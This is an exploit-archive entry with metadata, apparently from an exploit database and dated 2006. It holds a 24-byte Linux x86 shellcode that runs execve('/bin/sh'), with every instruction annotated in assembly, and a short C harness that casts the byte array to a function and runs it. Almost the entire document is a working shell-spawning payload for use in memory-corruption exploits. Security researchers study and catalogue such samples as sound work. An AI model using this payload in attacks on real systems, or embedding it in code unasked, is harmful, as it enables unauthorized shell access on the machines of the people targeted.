Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (2)
Author: hophet
type:
platform: linux_x86
port: 24.0
date_added: 2006-04-30
date_updated: 2017-08-24
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
/*
* [Linux/x86]
* Shellcode for: execve("/bin/sh", ["/bin/sh"], NULL)
* 24 bytes
* hophet [at] gmail.com
* http://www.nlabs.com.br/~hophet/
*
*/
char shellcode[] =
"\x99" // cltd
"\x31\xc0" // xor %eax,%eax
"\x52" // push %edx
"\x68\x6e\x2f\x73\x68" // push $0x68732f6e
"\x68\x2f\x2f\x62\x69" // push $0x69622f2f
"\x89\xe3" // mov %esp,%ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp,%ecx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80"; // int $0x80
int main() {
void (*p)();
p = (void *)&shellcode;
printf("Lenght: %d\n", strlen(shellcode));
p();
}
// milw0rm.com [2006-05-01]